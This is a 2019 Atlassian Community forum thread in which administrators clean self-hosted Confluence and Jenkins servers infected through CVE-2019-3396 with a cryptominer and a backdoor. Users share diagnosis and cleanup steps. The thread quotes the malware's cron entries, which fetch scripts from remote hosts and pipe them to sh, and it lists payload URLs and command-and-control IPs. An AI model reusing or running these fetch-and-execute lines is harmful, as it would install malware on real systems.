khugepageds eating all of the CPU

dovi5988 April 11, 2019

Hi,


We have confluence hosted on our own box for a few years now with no issues. We have confluence running under it's own user. Randomly yesterday the process khugepageds showed up using 600% of the CPU (the box has 8 CPU's in total, the rest are being used by Java). I stopped confluence and the process lives on. When I look at the processes I see:

501 9063 625 0.0 144936 13700 ? Ssl Apr10 9422:08 /tmp/khugepageds =/tmp/kerberods TERM=linux JRE_HOME=/opt/atlassian/confluence/jre/ NLSPATH=/usr/dt/lib/nls/msg/%L/%N.cat PATH=/sbin:/usr/sbin:/bin:/usr/bin:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin RUNLEVEL=3 runlevel=3 PWD=/opt/atlassian/confluence/bin LANGSH_SOURCED=1 LANG=en_US.UTF-8 PREVLEVEL=N previous=N XFILESEARCHPATH=/usr/dt/app-defaults/%L/Dt CATALINA_OPTS= -Xms1280m -Xmx1280m -XX:MaxPermSize=384m -XX:+UseG1GC -Djava.awt.headless=true -Xloggc:/opt/atlassian/confluence/logs/gc-2017-11-21_01-34-45.log -XX:+UseGCLogFileRotation -XX:NumberOfGCLogFiles=5 -XX:GCLogFileSize=2M -XX:-PrintGCDetails -XX:+PrintGCTimeStamps -XX:-PrintTenuringDistribution CONF_USER=confluence CONSOLETYPE=serial SHLVL=7 HOME= CATALINA_PID=/opt/atlassian/confluence/work/catalina.pid UPSTART_INSTANCE= UPSTART_EVENTS=runlevel UPSTART_JOB=rc _=/tmp/kerberods __DAEMON_FD_3=2f746d702f2e583131756e6978: __DAEMON_STAGE=

 

The log file  was last written to on 2019-02-22. Since it stayed up once I stopped confluence is it safe to kill? I don't want to kill a process that can potentially break my confluence setup.

 

 

17 comments

Deleted user April 11, 2019

Same thing here...we've been running Confluence without issue now for a few years, now this "khugepageds process is at near 100% utilization" issue is popping up as of yesterday.

I can kill the process, but it starts backup a few minutes later.

I rebooted the server yesterday and it started again a few hours later.

I temporarily froze the process with (of course the number is the pid):

sudo kill -STOP 12128

...but that doesn't seem like a good solution. EDIT: After 3 hours it apparently killed the stopped process and spawned a new one as I just had to do the same thing with a new PID.

Confluence bug?

Another EDIT: This article isn't directly about Confluence... it looks like THP can be disabled at boot (https://confluence.atlassian.com/bamkb/performance-issue-with-red-hat-enterprise-linux-rhel-781189906.html -> https://access.redhat.com/solutions/46111) but I cannot test this during business hours.

dovi5988 April 11, 2019

Can someone from Atlassian reach out to me directly on this?

Deleted user April 11, 2019

Yeah, there was a malicious looking cronjob. How did that happen? Has this happened to you before?

Deleted user April 11, 2019

I don't think Atlassian watches these forums...thank you for your sharing the link.

eleven12 April 11, 2019

Thank you Nick Smith! I noticed that the khugepageds was starting every 10 minutes and your note reminded me to check the user confluence's crontab entries. Sure enough, there was a suspicious entry that started every 10 minutes. I deleted it and the problem appears to have disappeared. I also upgraded to the latest version of Confluence.

Like Deleted user likes this
Deleted user April 11, 2019

David gave me the original idea.

I can't take this system out of production atm for the updates, so I followed the mitigation steps for now (disable Widget and WebDAV plug-ins), but it's been 30 min since I did that and no more suspicious looking activity

Johannes Schurer April 11, 2019

Its a virus. khugepageds is an obfuscated crypto miner and there is a second process kerberods that is a backdoor and using SSH to open reverse tunnels.

It's triggered by the user's crontab Confluence is running under.

Stop and disable cron. Kill both processes. Update.

Like # people like this
eleven12 April 11, 2019

I am having the same problem on my Linux server running Ubuntu 16.04 LTS. When doing a "top" command, khugepageds is at 100% on each core. It and kerberods are both listed as having user "conflue+". I have added the line to the grub file to set transparent_hugepage=never to disable it at boot time, set "never" in the transparent_hugepages/enabled and defrag files to disabled it at run time, and run hugeadm to disable it. Nothing works. I can kill the process, but it will restart after a while. Checking the /sys/kernel/mm/transparent_hugepages/enabled files shows "always madvise [never]", and checking the number of huge_pages being managed is at 0.  I have stopped Confluence. But nothing can stop khugepageds! :)

I am suspicious that it is at least Confluence (or Java) related due to the user being Confluence. I thought 

Zoran Pucar April 16, 2019

Your settings are not working because you are not seeing khugepaged doing the load but another binary named khugepaged to "hide" in your system. It is a malicious software.

As previously stated there are ways of disabling it in this thread.

Daniel Eads
Atlassian Team
Atlassian Team members are employees working across the company in a wide variety of roles.
April 12, 2019

What you've described is an active exploit that attacks the CVE-2019-3396 Widget Connector vulnerability from March 20th (see Confluence Security Advisory - 2019-03-20).

The first step in fixing this is upgrading to a Confluence version that is not affected by the vulnerability. The latest releases are:

Secondly, the LSD malware cleanup tool will be useful for removing the Kerberods malware. I would recommend executing cleanup after upgrading Confluence to a patched version so there's no possibility of re-infection while you work on the upgrade.

Please let me know if you have more questions!
Daniel | Atlassian Support

Robert Musto April 15, 2019

Our confluence will not load right since we have been infected, followed the guide and trying to get atlassian support is like pulling teeth, actually I would rather have my teeth pulled then trying to get valid support from this team. 

Deleted user April 15, 2019

Hi Robert,

I can't speak for your installation, but I can tell you what I did to mitigate on our system (in lieu of Atlassian's disappointing technical support...if I knew about the support bait and switch that would happen I would have heavily lobbied to not go this direction a few years ago).

Anyway—Log into console, Kill the kerberods and khugepageds processes by ascertaining the process id and killing them with sudo (hopefully you are not running Confluence as the root user)

pidof khugepageds
12345 <-- for example
sudo kill 12345

pidof kerberods
67890 <-- for example
sudo kill 12345

Open the Confluence user account's cron file in a text editor

sudo vim /var/spool/cron/confluence

Clear out any malicious entries (probably all of them unless you have added special entries).

I then followed Atlassian's guide to mitigate by manually disabling the WebDAV and Widget Connector plugins.

There has been no further evidence of malicious activity.

We were fortunate that we run this on an Amazon M4 and not on a T instance as this would have eaten up the CPU credits pretty quickly and removed our ability to even log into the console (or ran up a bill in unlimited mode which really could have sucked).

As soon as I can find an opportunity I am going to upgrade (can I just say major version upgrades are a pain).

Like William Rojas likes this
Daniel Eads
Atlassian Team
Atlassian Team members are employees working across the company in a wide variety of roles.
April 15, 2019

Hey @Robert Musto , I'm really sorry to hear that you had a bad experience getting support. I took a look at the tickets you had opened and while there were a few duplicates created, it seems like our support engineers were able to assist you over the phone today. If there were some things you felt needed improvement, we'd like to hear about that - you can reach out to me directly at deads at atlassian.com or reply on the ticket our team helped you with today.

@[deleted] please reach out to me via email as well (deads at atlassian.com) if you need help contacting support directly. I'm not sure what you mean by bait and switch - the only Confluence license I see on your account expired several years ago, so please reach out to me with concerns! We are active on Community but due to the sheer volume it's not guaranteed that we can respond to all threads directly. Part of what makes Community work is that everyone is able to contribute answers for the benefit of everyone. You've added some valuable info to this conversation, and that will definitely help people coming in to the thread looking for a solution!

Overall I will say that Dovid's original issue was an infection from the kerberods malware. Other attacks against the same vulnerability may be trying to insert different payloads, so it's possible that more recent infections might be from different malware. The steps noted by @[deleted] are a great starting point to doing a general malware cleanup while utilizing tools tailored to the specific malware infection.

Daniel | Atlassian Support

Kirk, Becky April 15, 2019

My environment experienced the same issue. We followed the Atlassian provided troubleshooting steps to a T. Is anyone else continuing to experience fall out AFTER upgrading confluence? It seems the upgrade wasn't enough and we are continuing to experience malware issues in our self hosted environment.  

 

Please let me know.

Daniel Eads
Atlassian Team
Atlassian Team members are employees working across the company in a wide variety of roles.
April 15, 2019

Hey @Kirk, Becky ,

While the first attack seemed to focus on injecting the kerberods malware, we are seeing reports of other attacks trying to deliver payloads of different malware. I can see that you've been working with our senior Support Engineers via ticket on support.atlassian.com. It's not clear from the ticket that Confluence was upgraded, so if possible I suggest adding that information (or the support zips / info requested by the support team) to the ticket.

After adding that info to the ticket, for next-steps you can take a look at the output from top if you are on Linux to find any processes consuming large amounts of CPU. If Confluence is not running, you should be able to kill any processes running under the confluence user account. Use the kill -9 command followed by the process id (pid) to kill the processes consuming high CPU running under the Confluence account.

Nick's advice to check the crontab for malicious entries is also very good:

Open the Confluence user account's cron file in a text editor

sudo vim /var/spool/cron/confluence

Clear out any malicious entries (probably all of them unless you have added special entries).

It's difficult for the support team to help in your specific case without the requested info though, so please add that to the ticket.

Daniel | Atlassian Support

Dovid Bender April 16, 2019

I would add that you need to clean out the cron fairly fast. So long as either kerberods is running or the cron job is there it's going to be an endless game of whack a mole. Please see my note below to @Andrea C . You need do it almost all at once. e.g.

> /var/spool/cron/confluence ; kill -9 PID_OF_kerberods ; kill -9 PID_OF_khugepageds


I say to use > and not to edit with vim as the time it takes to launch the editor the cron could have restarted.

 

Make sure you aren't clearing out any crons that you do want for user confluence!. Using > will clean out the file. 

Deleted user April 16, 2019

Is there anything else to worry about execpt for the malicious infection by kerberods malware? Could the attacker have been able to dump database or get the private Key from Keystore? Is it usefull to run the system "normally" again after upgrading or is it better to setup a new confluence?

Dovid Bender April 16, 2019

That really depends in how you were running confluence. If you were running it as root they could have gotten access to anything. What user was confluence running as? That being said we tested the malware over and over in a sandbox environment and the only thing we saw that it was interested in, was harnessing CPU cycles. The moment we killed all processes and cleaned out the cron jobs all network traffic (other then the ssh session to the sandbox) ceased to exist. If you were running in root to be safe I would suggest to set up a new system and migrate over all of your data (to be safe).

Andrea C April 16, 2019

I'm having the exact same problem, I have an entry in the cron file but it regenerates even if I delete it. 

My problem is that the process kerberods appears only for just a few seconds after the confluence process goes down. 

Please help as my production environment is currently down. I already upgraded to the latest version but that didn't fix it.Screen Shot 2019-04-16 at 11.20.18 AM.png

Dovid Bender April 16, 2019

@Andrea C It seems as if it's still running somewhere and you aren't fully cleanning it out. Based on the output of top above it seems you are running it as user confluence which is a good thing. Here is what I would do:

1) cat /var/spool/cron/confluence # Verify that there are no other cronjobs there for user confluence. If there are back them up.

2) ps auxef | grep 'khugepageds\|kerberods'

Get the pids of the above processes. You need to run below in this order:

> cat /var/spool/cron/confluence ; kill -9 PID_OF_kerberods ; kill -9 khugepageds

3) cat /var/spool/cron/confluence # verify that it's empty

4) ps auxef | grep 'khugepageds\|kerberods' # verify they are not running.

5) rm -rf /tmp/khugepageds ; rm -rf /tmp/kerberods

Andrea C April 16, 2019

@dovi5988 thanks a lot for your help Dovid!

Now Confluence is online for two hours and a half and the only thing that I did is trying to run that malware cleanup tool which I managed to run it but I don't think it executed all the lines of the script.

Here is what was happening when confluence was going down:

  1. confluence is running as the user confluence (not root), two processes since I have concurrent editing on.
  2. the cpu was spiking up to more than 100%
  3. Both confluence process were going down
  4. Only the kerberods process was running for just a few seconds and then it was disappearing, as you saw from the screenshot.

Now, even though Confluence is currently up, I want to make sure that everything is fine as I don't want any more surprises.

This is the output after running the first command you suggested:

*/10 * * * * (curl -fsSL https://dd.heheda.tk/i.jpg||wget -q -O- https://dd.heheda.tk/i.jpg)|sh

This is definitely something not legit right?

Also, how can I get the pid of kerberods since it's not running?

Andrea C April 16, 2019

I deleted the cron entry and it didn't reappear again.

Like Dovid Bender likes this
Dovid Bender April 16, 2019

@Andrea C

1) make sure the cron is empty.

2) ps auxef | grep 'khugepageds\|kerberods' # verify they are not running.

 

If they all come up clean you should be good. Before when you were killing it, the cron was starting it up again.

Andrea C April 16, 2019

@dovi5988 cron is still empty. When I'm running the second command I get a long result (I'm not copying it all): 

root      4296  0.0  0.0 110512  2044 pts/0    S+   14:43   0:00                                      \_ grep --color=auto khugepageds\|kerberods LESS_TERMCAP_mb=?[01;31m HOSTNAME=ip-172-31-27-207 LESS_TERMCAP_md=?[01;38;5;208m LESS_TERMCAP_me=?[0m SHELL=/bin/bash TERM=xterm-256color HISTSIZE=1000 EC2_AMITOOL_HOME=/opt/aws/amitools/ec2 LESS_TERMCAP_ue=?[0m USER=root LS_COLORS

Dovid Bender April 16, 2019

That's probably your grep command. Try this:
ps auxef | grep 'khugepageds\|kerberods' | grep -v grep

If that comes back with nothing you should be good.

Andrea C April 16, 2019

it comes back with nothing.

Now I have another confluence instance with a different problem: a process by the confluence user with empty command. I tried to run sudo kill 2864 but it didn't do anything.

Screen Shot 2019-04-16 at 4.50.15 PM.png

Dovid Bender April 16, 2019

Try this:

ps auxef > /tmp/ll

 

Then edit file /tmp/ll and see if you can find what's causing it to start. From my own experience when conflucnce starts it's a resource hogger. The malware is set to kill anything using too much CPU. Did you upgrade your system? If you don't you will keep getting hit.

Andrea C April 16, 2019

Did someone use the lsd malware cleanup tool? I copy busybox but then when I run the script, it gives a permission denied error and I'm logged in as root. Clearly I need to change some permissions in order to make it run properly.

Dovid Bender April 16, 2019

@Andrea C I am not sure if there is an option here but if you can private message me and I can take a look with you together at it.

warthog April 16, 2019

Dont mean to hijack but im having issue with busybox as well 

 

./clear_kerberods.sh: line 1: syntax error near unexpected token `newline'
./clear_kerberods.sh: line 1: `<!DOCTYPE html>'

Dovid Bender April 16, 2019

@warthog Were you running confluence as root or another user? If the latter please see what I wrote to @Andrea C . You need to clear out the cronjob and then kill the processes.

warthog April 16, 2019

was running as confluence users,  running steps thanks!

warthog April 16, 2019

We got hit with this as well, trying to clean it up, but keep on getting kicked out when i try to sudo as confluence user to kill cron.

 

Does anyone know what data this was mining for?   Is just upgrading safe or will they still have access to data.

Dovid Bender April 16, 2019

No need to sudo. You can clean it  from root:

1) su root - 

2) > /var/spool/cron/confluence

 

No one knows for sure what it did but from all the research I did it seemed it was limited to getting CPU cycles. Based on sniffing the traffic it seemed to be the same.

warthog April 16, 2019

So one thing i noticed it downloaded and installed Python 2.7.12 ..

Dovid Bender April 16, 2019

How did you see that? If you weren't running as root it should have not had permission to install anything.

warthog April 16, 2019

I had set it up to run as confluence user. im looking into it now, just in case i changed my root pswd

Dovid Bender April 16, 2019

Feel free to email me at: dovi5988 -- gmail.com

Jeff Turner April 16, 2019

As a consultant, I cleaned up a client's hacked Confluence on Monday, and wrote up the experience:

What to do when your Confluence is hacked

Feedback welcome.

Like # people like this
Brian Hill April 17, 2019

Excellent write-up @Jeff Turner - thx for taking the extra time to document intervention steps for the benefit of others.

Jeff Turner
Rising Star
Rising Star
Rising Stars are recognized for providing high-quality answers to other users. Rising Stars receive a certificate of achievement and are on the path to becoming Community Leaders.
April 25, 2019

According to this alertlogic.com blog, this vulnerability is also being exploited to launch ransomware.

Like Brian Hill likes this
llondono April 17, 2019

Was anyone able to find out how they were able to get the crontab entry added? Was it because they had that access to the specified addons and it had permission to the crontab?

Like Roo likes this
Dovid Bender April 17, 2019

They ran the curl command which called the bash script (via pastebin) which gets kerberods which creates the cronjob.

Roo April 19, 2019

@dovi5988  I think what Ilondono was asking how the crontab entry was added.  I am trying to figure this out too. Can anyone chip-in?

Zoran Pucar April 20, 2019

Roo the bug allows remote execution! This means you can execute any command as confluence user on the system running it. Including adding crontab entries. 

Dovid Bender April 17, 2019

FYI: Another advisory was released..... Time to upgrade again. https://confluence.atlassian.com/doc/confluence-security-advisory-2019-04-17-968660855.html

David Yu
Rising Star
Rising Star
Rising Stars are recognized for providing high-quality answers to other users. Rising Stars receive a certificate of achievement and are on the path to becoming Community Leaders.
April 18, 2019

Hope everyone was able to clean their systems up. I'm subscribed to all Tech Alerts to stay on top of security vulnerabilities, but in this case, Atlassian did not e-mail me, but another colleague notified me.

I reached out to their support and they fixed a bug in their mailer so it's a good time to also check your Email notification preferences at https://my.atlassian.com and ensure you're listed as a Technical Contact in your product.

Like Brian Hill likes this
abhijitsharma806 April 19, 2019

Hi All

I have also faced the same types of issues in my Jenkins Server 

/tmp/khugepageds use 200% CPU of my AWS t2.medium instances .

I have taken some steps. Please follow it it may help you guys.

1 - By using top/htop find the pid of /tmp/khugepageds (Most probably less number of pid is the parent pid)

2- By using that PID do # lsof -p 1919

3 - Then you can get the IP

4- Go to Your firewall rule INbound & OUTbound and block that IP.

5- Now check 
cat /var/spool/cron/crontabs/jenkins is thr any cron tab entry are available.

6- I have trace that IP location it is coming from United States and ISP is DigitalOcean LLC

Screenshot 2019-04-19 at 3.20.52 PM.pngScreenshot 2019-04-19 at 4.02.10 PM.pngScreenshot 2019-04-19 at 4.01.45 PM.pngScreenshot 2019-04-19 at 4.05.51 PM.pngScreenshot 2019-04-19 at 5.28.21 PM.png

Like Dovid Bender likes this
abhijitsharma806 April 19, 2019

Try to remove the cron file. For me the location is /var/spool/cron/crontabs/jenkins

*/10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O- https://pastebin.com/raw/wR3ETdbi)|sh

7- I have blocked the IP in AWS VPC NACL, after that CPU got reduced. If possible restart the Jenkins services.

This may help you guys.

 

Screenshot 2019-04-19 at 5.38.18 PM.pngScreenshot 2019-04-19 at 5.38.12 PM.pngScreenshot 2019-04-19 at 5.32.38 PM.png

Dovid Bender April 19, 2019

The digital Ocean IP seems to be the phone home IP. The other IP's that you see is the malware attacking other hosts in the same /16 as you. It's trying to get your host to attack others.

abhijitsharma806 April 19, 2019

8- Please try to clean /tmp folder (#rm -rf /tmp/*)

Thank you @dovi5988 If possible can you please check the attached screen shot, because I have ssh to my Jenkins server and do the lsof, and My home public IP's are different.

If it is my phone/home IP then why /tmp/khugepageds process is trying to access and after blocking in AWS NACL level it is not able to try to contact.

Zoran Pucar April 19, 2019

One problem is that the cron job can be hard to trace, depending on the user run by confluence.

Fortunately, the exploit doesn't do privilege escalation but can only run as confluence user. To bad if you are running confluence as root. 

Now, since the exploit can work differently depending on distro and user, one way to remove "the teeth" from the cron-job (while searching for it) is to remove the access to pastebin.com (note this is for IPv4. Pastebin.com has AAA records so if you are using IPv6 make sure you add those rules too. The method below is only for reference and won't stay of you reboot the server. This way even if you leave the cron-job running it won't work. 

[root@iowerwatch ~]# host pastebin.com

pastebin.com has address 104.20.209.21

pastebin.com has address 104.20.208.21

...

[root@iowerwatch ~]# iptables -A OUTPUT -d 104.20.209.21/32 -j REJECT --reject-with icmp-port-unreachable

[root@iowerwatch ~]# iptables -A OUTPUT -d 104.20.208.21/32 -j REJECT --reject-with icmp-port-unreachable

Like Brian Hill likes this
abhijitsharma806 April 19, 2019

Hi @dovi5988 

By using that /var/spool/cron/crontabs/jenkins, Inside that some URL are available if you open the URL you can found some scripts.

https://pastebin.com/raw/wR3ETdbi
https://pastebin.com/raw/Zk7Jv9j2
https://pastebin.com/raw/0Sxacvsh

 

Please find the screen shot also. And that IP already mentioned inside the script.

There are 2 IPS, Hope this will help.

119.9.106.27 and
104.130.210.206

Screenshot 2019-04-19 at 6.06.40 PM.pngScreenshot 2019-04-19 at 6.08.14 PM.pngScreenshot 2019-04-19 at 6.08.25 PM.png

abhijitsharma806 April 19, 2019

I found one more cron entry for Jenkins user, and deleted that also.

Screenshot 2019-04-19 at 6.19.30 PM.png

bluelight April 25, 2019

dd.heheda.tk resolves @ Cloudflare https://db-ip.com/104.18.59.79

I opened a support ticket https://support.cloudflare.com/hc/requests/1677155

Thanks

Comment

Log in or Sign up to comment
TAGS
AUG Leaders

Atlassian Community Events